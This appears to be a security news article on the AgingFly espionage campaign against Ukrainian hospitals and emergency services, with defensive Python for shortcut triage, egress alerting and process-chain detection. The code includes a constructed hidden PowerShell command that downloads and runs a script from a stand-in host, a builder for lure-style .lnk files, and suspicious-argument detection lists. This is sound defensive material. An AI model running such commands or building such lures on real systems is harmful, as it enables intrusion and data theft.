Ukrainian emergency services and hospitals hit by espionage campaign using new AgingFly malware

April 17, 2026 · 7 min read · 2 sources

Introduction

A persistent Russian state-sponsored hacking group has been linked to a new cyber-espionage campaign targeting critical Ukrainian infrastructure, including hospitals, local government bodies, and the nation's State Emergency Service. According to an alert from Ukraine's Computer Emergency Response Team (CERT-UA), the campaign leverages a previously undocumented malware tool named AgingFly, underscoring the adversary's continuous development of custom tooling to sustain its intelligence-gathering operations against Ukraine.

Background: The Relentless Campaign of UAC-0027

The threat actor attributed to this activity is UAC-0027, a group widely known in the cybersecurity community as Gamaredon, Pterodo, or Armageddon. Active since at least 2013, UAC-0027 is believed to be an arm of Russia's Federal Security Service (FSB) and has maintained a singular, intense focus on Ukrainian targets. Their operations are characterized by high-volume spear-phishing campaigns designed for widespread, persistent access to government, military, and critical infrastructure networks.

This latest campaign, observed in late 2023 and early 2024, is not a deviation from their long-term strategy but an evolution of their tactics. By deploying a new malware family, the group aims to bypass existing security measures and refresh its toolkit to ensure its espionage objectives are met. The targeting of emergency services and healthcare providers is a calculated move, seeking intelligence that provides insight into Ukraine's civil response capabilities, resource allocation, and societal resilience amidst the ongoing conflict.

Technical Breakdown: How AgingFly Infects a System

The attack chain documented by CERT-UA follows a familiar, yet effective, playbook centered on social engineering. The campaign relies on user interaction rather than exploiting software vulnerabilities for initial access.

  1. Initial Access via Spear-Phishing: The attack begins with a carefully crafted spear-phishing email. These emails are designed to appear legitimate, often containing themes relevant to the target organization. For instance, lures have included documents named “Civil Defense Action Plan.” The emails carry a malicious attachment, typically a RAR archive.
  2. LNK File Execution: Inside the archive, the victim finds a Windows Shortcut file (.LNK) masquerading as a document. The disguise works because a shortcut can carry any icon and Explorer does not display the .lnk extension even when file extensions are enabled. When the user double-clicks the file, Windows runs the target and arguments stored inside the shortcut instead of opening a document.
  3. PowerShell Deployment: The LNK file's primary function is to launch a PowerShell script. PowerShell is a powerful command-line tool built into Windows, making it a favorite for attackers as its activity can blend with legitimate administrative tasks. This script is responsible for the next stage of the infection.
  4. Payload Delivery and Persistence: The PowerShell script connects to an attacker-controlled server to download and execute the main payload: the AgingFly malware. AgingFly is typically a Dynamic Link Library (DLL) file. To ensure it survives a system reboot, the malware establishes persistence by creating a scheduled task that relaunches it at regular intervals.
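To see what such a shortcut actually hides, here is an added example (not code from the original page or from CERT-UA) that parses the ShellLink format's header and StringData and then applies a few triage heuristics to a constructed .lnk imitating the chain above. The file name reuses the page's lure title; the PowerShell arguments, the icon path, the example.invalid URL and the heuristics themselves are assumptions for illustration, not the campaign's real values.

```python
import struct
from pathlib import PureWindowsPath

# LinkFlags bits (MS-SHLLINK 2.1.1), read from offset 20 of the 76-byte ShellLinkHeader.
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
SW_SHOWMINNOACTIVE = 7  # ShowCommand: start minimized, do not activate (the window stays out of sight)

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe",
                "cscript.exe", "rundll32.exe", "regsvr32.exe"}
DOC_SUFFIXES = {".doc", ".docx", ".pdf", ".xls", ".xlsx", ".rtf", ".txt"}
SUSPICIOUS_ARGS = ("-w hidden", "-windowstyle hidden", "-enc", "-ep bypass",
                   "-executionpolicy bypass", "-nop", "downloadstring", "invoke-webrequest", "iwr ")


def parse_lnk(data: bytes) -> dict:
    """Walk ShellLinkHeader -> LinkTargetIDList -> LinkInfo -> StringData, returning the strings."""
    header_size, = struct.unpack_from("<I", data, 0)
    if header_size != 0x4C:
        raise ValueError("not a ShellLink file")
    flags, = struct.unpack_from("<I", data, 20)
    show_command, = struct.unpack_from("<I", data, 60)
    pos = 76
    if flags & HAS_LINK_TARGET_ID_LIST:          # IDListSize (uint16) + item ID list
        size, = struct.unpack_from("<H", data, pos)
        pos += 2 + size
    if flags & HAS_LINK_INFO:                    # LinkInfoSize (uint32) includes itself
        size, = struct.unpack_from("<I", data, pos)
        pos += size

    def read_string() -> str:                    # CountCharacters (uint16) + chars, no terminator
        nonlocal pos
        count, = struct.unpack_from("<H", data, pos)
        pos += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[pos:pos + count * width]
        pos += count * width
        return raw.decode("utf-16-le" if width == 2 else "cp1252")

    info = {"show_command": show_command}
    for bit, name in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                      (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                      (HAS_ICON_LOCATION, "icon_location")):
        if flags & bit:
            info[name] = read_string()
    return info


def triage_lnk(filename: str, data: bytes) -> list:
    """Reasons a shortcut looks like a document-themed launcher; empty list if it looks clean."""
    info = parse_lnk(data)
    findings = []
    target = PureWindowsPath(info.get("relative_path", "")).name.lower()
    if target in SCRIPT_HOSTS:
        findings.append(f"target is a script host: {target}")
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("ShowCommand=SW_SHOWMINNOACTIVE (window kept out of sight)")
    path = PureWindowsPath(filename)
    if path.suffix.lower() == ".lnk" and PureWindowsPath(path.stem).suffix.lower() in DOC_SUFFIXES:
        findings.append(f"document double extension: {filename}")
    args = info.get("arguments", "").lower()
    hits = [k for k in SUSPICIOUS_ARGS if k in args]
    if hits:
        findings.append("suspicious arguments: " + ", ".join(hits))
    return findings


def build_sample_lnk(target: str, arguments: str, icon: str, show_command: int) -> bytes:
    """Assemble a minimal .lnk; this is constructed test data, not a sample from the campaign."""
    header = bytearray(76)
    struct.pack_into("<I", header, 0, 0x4C)
    header[4:20] = bytes.fromhex("0114020000000000c000000000000046")   # LinkCLSID
    struct.pack_into("<I", header, 20, HAS_RELATIVE_PATH | HAS_ARGUMENTS | HAS_ICON_LOCATION | IS_UNICODE)
    struct.pack_into("<I", header, 60, show_command)

    def s(value: str) -> bytes:
        return struct.pack("<H", len(value)) + value.encode("utf-16-le")

    return bytes(header) + s(target) + s(arguments) + s(icon)


# Constructed lure: the page's document title, a PowerShell target, a hidden window and assumed stage-2 arguments.
POWERSHELL = r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
LURE_NAME = "Civil Defense Action Plan.docx.lnk"
LURE_LNK = build_sample_lnk(
    POWERSHELL,
    r'-w hidden -ep bypass -nop -c "iwr http://c2.example.invalid/s.ps1 -OutFile $env:TEMP\s.ps1; & $env:TEMP\s.ps1"',
    r"%SystemRoot%\System32\imageres.dll",  # borrows a stock icon so the file looks like a document
    SW_SHOWMINNOACTIVE)
BENIGN_NAME = "Notepad.lnk"
BENIGN_LNK = build_sample_lnk(r"..\..\Windows\System32\notepad.exe", "",
                              r"%SystemRoot%\System32\notepad.exe", 1)  # 1 = SW_SHOWNORMAL

if __name__ == "__main__":
    for name, blob in ((LURE_NAME, LURE_LNK), (BENIGN_NAME, BENIGN_LNK)):
        print(name, "->", parse_lnk(blob)["relative_path"], triage_lnk(name, blob) or "clean")
```

Run it against any .lnk pulled from a quarantined archive by passing the file's bytes to `triage_lnk`; the parser skips the LinkTargetIDList and LinkInfo blocks by their declared sizes, so it also handles shortcuts that carry an absolute target rather than a relative path (in that case the target lives in the ID list, which this example does not decode).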

Capabilities of the AgingFly Malware

Once active on a compromised system, AgingFly functions as a dedicated espionage tool. Its primary capabilities include:

  • System Profiling: It gathers extensive information about the infected machine, including its name, the current user, operating system version, installed software, and network configuration.
  • Data Reconnaissance: The malware scans the system for files of interest, likely based on keywords, file types, or specific locations relevant to the targeted organization.
  • Screen Capture: AgingFly can take screenshots of the user's desktop, providing the attackers with a real-time view of the victim's activities, open documents, and communications.
  • Data Exfiltration: Collected data is packaged and sent to command-and-control (C2) servers managed by UAC-0027. The malware demonstrates flexibility in its exfiltration channels, using a mix of legitimate services to hide its traffic. CERT-UA observed the use of Telegram for initial C2 communication, as well as FTP (File Transfer Protocol) and WebDAV for uploading stolen files. Routing C2 through a widely used service such as Telegram makes the traffic harder to detect and block, because it is ordinary HTTPS to a legitimate domain that many organizations allow.
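As an added example (not from the page or from CERT-UA), the following Python runs simple egress rules over constructed endpoint and proxy records that reflect the three channels above: a non-Telegram process talking to api.telegram.org, an FTP control connection from a process that is not a sanctioned FTP client, and WebDAV methods sent to a host outside an allowlist. The hostnames, the use of rundll32.exe as the DLL-hosting process, the allowlist and the records themselves are all assumptions made for the example.

```python
from dataclasses import dataclass


@dataclass
class NetEvent:
    """One outbound connection as an EDR or proxy would record it (constructed for this example)."""
    ts: str
    endpoint: str      # hostname of the workstation
    process: str       # image that opened the socket
    dest: str          # destination host name (or IP if no name was resolved)
    dport: int
    method: str = ""   # HTTP method when a proxy sees the request, else empty
    bytes_out: int = 0


TELEGRAM_API = {"api.telegram.org"}            # Bot API endpoint; the desktop client uses other hosts
TELEGRAM_CLIENTS = {"telegram.exe"}
FTP_CLIENTS = {"winscp.exe", "filezilla.exe"}  # assumed: the only sanctioned FTP clients
WEBDAV_METHODS = {"PROPFIND", "PROPPATCH", "MKCOL", "PUT", "MOVE", "COPY", "LOCK"}
APPROVED_WEBDAV = {"dav.corp.example"}         # assumed: the organization's own WebDAV server
UPLOAD_BYTES = 1_000_000                       # mark the alert when a connection pushed more than 1 MB out


def _alert(e, rule, detail):
    return {"ts": e.ts, "endpoint": e.endpoint, "rule": rule, "detail": detail}


def egress_alerts(events):
    """Apply the three channel rules to each record; returns one alert dict per rule hit."""
    alerts = []
    for e in events:
        proc, dest, method = e.process.lower(), e.dest.lower(), e.method.upper()
        tag = " (bulk upload)" if e.bytes_out > UPLOAD_BYTES else ""
        if dest in TELEGRAM_API and proc not in TELEGRAM_CLIENTS:
            alerts.append(_alert(e, "telegram-api", f"{proc} -> {dest}:{e.dport}{tag}"))
        if e.dport == 21 and proc not in FTP_CLIENTS:
            alerts.append(_alert(e, "ftp-upload", f"{proc} -> {dest}:21{tag}"))
        if method in WEBDAV_METHODS and dest not in APPROVED_WEBDAV:
            alerts.append(_alert(e, "webdav-upload", f"{proc} {method} {dest}:{e.dport}{tag}"))
    return alerts


def summarize(alerts):
    """Collapse alerts to {endpoint: sorted rule names} to see which hosts to pull for forensics."""
    out = {}
    for a in alerts:
        out.setdefault(a["endpoint"], set()).add(a["rule"])
    return {k: sorted(v) for k, v in out.items()}


# Constructed records: one infected workstation next to ordinary activity from another.
SAMPLE_EVENTS = [
    NetEvent("09:01:10", "ws-admin-02", "chrome.exe", "web.telegram.org", 443, "GET"),
    NetEvent("09:01:55", "ws-admin-02", "outlook.exe", "outlook.office365.com", 443),
    NetEvent("09:02:03", "ws-admin-02", "svchost.exe", "dav.corp.example", 443, "PROPFIND"),
    NetEvent("09:14:21", "ws-hosp-17", "rundll32.exe", "api.telegram.org", 443, "POST", 2_048),
    NetEvent("09:15:02", "ws-hosp-17", "rundll32.exe", "203.0.113.10", 21, "", 4_194_304),
    NetEvent("09:16:40", "ws-hosp-17", "rundll32.exe", "198.51.100.7", 80, "PUT", 1_572_864),
]

if __name__ == "__main__":
    for a in egress_alerts(SAMPLE_EVENTS):
        print(a["ts"], a["endpoint"], a["rule"], a["detail"])
    print(summarize(egress_alerts(SAMPLE_EVENTS)))
```

The process field is what gives these rules their precision: a browser reaching web.telegram.org or a system service talking to the in-house WebDAV server produces nothing, while the same destinations contacted by a DLL host on a hospital workstation produce three alerts on one endpoint. Feed the function from whatever your EDR exports (Sysmon Event ID 3 plus proxy logs is the usual pairing).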

Impact Assessment: Targeting the Heart of Civil Infrastructure

The targeting of emergency services and hospitals is strategically significant and carries severe potential consequences. While this campaign appears focused on espionage rather than immediate destruction, the intelligence gathered can be weaponized in numerous ways.

Affected Organizations: The primary targets are the State Emergency Service of Ukraine (SESU), various hospitals, and local government bodies. These organizations form the backbone of Ukraine's civil defense and humanitarian response.

Severity and Consequences:

  • Intelligence Loss: The exfiltration of data from these entities could provide Russian military and intelligence agencies with critical insights. This includes emergency response plans, locations of shelters, casualty statistics, resource and supply chain information for hospitals, and sensitive government communications. Such intelligence could be used to refine military targeting, exploit civil vulnerabilities, or inform propaganda efforts.
  • Humanitarian Risks: Attacks on the healthcare sector are particularly concerning. The compromise of patient data, including that of military personnel or government officials, represents a serious privacy breach. Furthermore, the presence of malware on hospital networks, even for espionage, poses an indirect risk of disrupting critical medical services, either through system instability or by providing an access point for a future destructive attack.
  • Erosion of Trust: Persistent cyberattacks against essential public services can undermine citizens' trust in the government's ability to protect them and their data, a key objective in hybrid warfare.
  • Resource Drain: For Ukrainian defenders, the continuous need to detect, analyze, and remediate infections from persistent actors like UAC-0027 drains valuable time and resources that are already stretched thin.

How to Protect Yourself and Your Organization

Defending against a persistent and adaptive threat like UAC-0027 requires a multi-layered security approach. Organizations, particularly those in critical sectors, should take immediate steps to harden their defenses.

For Organizations:

  • User Training and Awareness: Since the primary attack vector is phishing, educating employees to recognize and report suspicious emails is the first line of defense. Emphasize the danger of opening attachments, especially archives like RAR or ZIP, from unverified sources.
  • Email Security: Implement advanced email filtering solutions to block malicious attachments and links before they reach user inboxes.
  • Endpoint Detection and Response (EDR): Deploy EDR to monitor process lineage. An opened shortcut leaves a recognizable footprint: powershell.exe spawned by explorer.exe with window-hiding, execution-policy-bypass or encoded-command arguments, followed by a scheduled task being created and a DLL being loaded from a user-writable directory. Use the Indicators of Compromise (IOCs) published by CERT-UA to hunt for signs of AgingFly activity.
  • Restrict Scripting Environments: Execution policy is not a security boundary; a shortcut can simply pass -ExecutionPolicy Bypass. Where PowerShell is not needed for administration, constrain it with AppLocker or Windows Defender Application Control (which also places PowerShell in Constrained Language Mode), remove the PowerShell 2.0 engine, and enable Script Block Logging so that downloaded second-stage scripts are recorded even when obfuscated.
  • Network Monitoring: Monitor outbound traffic for connections to known C2 infrastructure and for services such as Telegram, FTP and WebDAV that the organization does not use for business. WebDAV over HTTPS looks like ordinary web traffic on the wire; catch it at the proxy by method (PROPFIND, PUT) or on the endpoint by the process making the connection, which for malware is a script host or DLL-hosting process rather than a browser. A VPN such as hide.me encrypts remote-access traffic but is not a defense against a payload the user launched themselves.
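The EDR hunt described above, as an added example (not from the page or any vendor): a two-pass detector over constructed Sysmon-style process-creation records that first flags powershell.exe spawned by explorer.exe with hiding, bypass or download arguments (the footprint of an opened shortcut), then flags scheduled-task creation and DLL loads from user-writable paths that descend from that shell. The PIDs, paths, task name and DLL name are constructed; a production version should key on Sysmon's ProcessGuid, since PIDs are reused.

```python
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Subset of Sysmon Event ID 1 (constructed). Real detections should key on ProcessGuid, not PID."""
    pid: int
    ppid: int
    image: str
    command_line: str


PS_INDICATORS = ("-w hidden", "-windowstyle hidden", "-enc", "-ep bypass", "-executionpolicy bypass",
                 "-nop", "downloadstring", "invoke-webrequest", "iwr ")
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\downloads\\", "\\users\\public\\")
DLL_HOSTS = {"rundll32.exe", "regsvr32.exe"}


def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


class ChainDetector:
    def __init__(self, events):
        self.events = events
        self.by_pid = {e.pid: e for e in events}
        self.flagged = set()   # PIDs of PowerShell instances matching the opened-shortcut pattern

    def ancestors(self, e):
        chain, seen = [], set()
        while e.ppid in self.by_pid and e.ppid not in seen:
            seen.add(e.ppid)
            e = self.by_pid[e.ppid]
            chain.append(e)
        return chain

    def descends_from_flagged(self, e):
        return any(a.pid in self.flagged for a in self.ancestors(e))

    def run(self):
        alerts = []
        # Pass 1: explorer.exe -> powershell.exe with hiding/bypass/download arguments.
        # Explorer is the parent because the shortcut itself is data, not a process.
        for e in self.events:
            parent = self.by_pid.get(e.ppid)
            if image_name(e.image) in {"powershell.exe", "pwsh.exe"} and parent \
                    and image_name(parent.image) == "explorer.exe":
                hits = [k for k in PS_INDICATORS if k in e.command_line.lower()]
                if hits:
                    self.flagged.add(e.pid)
                    alerts.append((e.pid, "shortcut-style powershell launch", ", ".join(hits)))
        # Pass 2: persistence and DLL loading that descend from a flagged shell.
        for e in self.events:
            cl = e.command_line.lower()
            name = image_name(e.image)
            if name == "schtasks.exe" and "/create" in cl and self.descends_from_flagged(e):
                alerts.append((e.pid, "scheduled task created under suspicious powershell", e.command_line))
            if name in DLL_HOSTS and any(d in cl for d in USER_WRITABLE) and self.descends_from_flagged(e):
                alerts.append((e.pid, "dll loaded from user-writable path", e.command_line))
        return alerts


# Constructed telemetry: the chain from the page, then benign admin activity that must not fire.
SAMPLE_EVENTS = [
    ProcEvent(1000, 800, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(2000, 1000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell.exe -w hidden -ep bypass -nop -c "iwr http://c2.example.invalid/s.ps1 -OutFile $env:TEMP\s.ps1; & $env:TEMP\s.ps1"'),
    ProcEvent(3000, 2000, r"C:\Windows\System32\schtasks.exe",
              r'schtasks.exe /create /sc minute /mo 10 /tn Updater /tr "rundll32.exe C:\Users\u\AppData\Roaming\u.dll,Start" /f'),
    ProcEvent(3100, 2000, r"C:\Windows\System32\rundll32.exe", r"rundll32.exe C:\Users\u\AppData\Roaming\u.dll,Start"),
    ProcEvent(2100, 1000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell.exe"),
    ProcEvent(600, 1000, r"C:\Windows\System32\cmd.exe", "cmd.exe"),
    ProcEvent(700, 600, r"C:\Windows\System32\schtasks.exe", r"schtasks.exe /create /sc daily /tn Backup /tr C:\Tools\backup.exe"),
]

if __name__ == "__main__":
    for pid, rule, detail in ChainDetector(SAMPLE_EVENTS).run():
        print(pid, rule, detail)
```

The second pass deliberately requires a flagged ancestor, so an administrator creating a task from an interactive cmd.exe produces nothing; if you would rather see every task creation from a user session, drop that condition and accept the extra triage load.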

For Individuals:

  • Practice Email Skepticism: Be wary of any unsolicited email, especially those that create a sense of urgency or ask you to open an attachment. Verify the sender's identity through a separate communication channel if you have any doubts.
  • Reveal File Extensions: In Windows, enable the display of file extensions so that a file such as `report.docx.exe` is not mistaken for a document. Be aware that this setting does not expose shortcuts: Explorer hides `.lnk` even with extensions shown, so `Civil Defense Action Plan.docx.lnk` still appears as `Civil Defense Action Plan.docx`. Look for the small arrow overlay on the icon and for the Type column reading "Shortcut" in Details view, and treat any "document" that arrives inside an archive with that overlay as hostile.
  • Use Antivirus Software: Ensure you have a reputable antivirus or anti-malware solution installed and that it is kept up to date.

The AgingFly campaign is a stark reminder that the cyber front of the Russia-Ukraine war is active and evolving. The deliberate targeting of humanitarian and civil organizations highlights the adversary's commitment to intelligence gathering by any means necessary. For defenders in Ukraine and their allies, vigilance and proactive threat hunting remain essential tools in countering this persistent threat.


// FAQ

What is AgingFly?

AgingFly is a new malware tool used for cyber-espionage. Its capabilities include collecting system information, taking screenshots, and stealing files from an infected computer. It was first identified in a campaign against Ukrainian critical infrastructure in early 2024.

Who is behind the AgingFly malware campaign?

The campaign is attributed to UAC-0027, a Russian state-sponsored threat group also known as Gamaredon or Armageddon. This group is believed to be affiliated with Russia's Federal Security Service (FSB) and has a long history of targeting Ukraine.

Why are hospitals and emergency services being targeted?

These organizations are targeted for intelligence gathering. Gaining access to their networks can provide the attackers with sensitive information about civil defense plans, resource allocation, casualty numbers, and other data that is valuable for military and political strategy in an ongoing conflict.

How does the AgingFly infection start?

The infection typically starts with a spear-phishing email containing a malicious attachment, such as a RAR archive. Inside the archive is a Windows Shortcut (.LNK) file disguised as a document. When the user opens the LNK file, it executes a PowerShell script that downloads and runs the AgingFly malware.

Is this attack destructive?

The primary goal of the AgingFly campaign appears to be espionage and data theft, not destruction. However, the presence of any malware on critical systems carries an inherent risk of causing instability or providing a foothold for a future, more destructive attack.
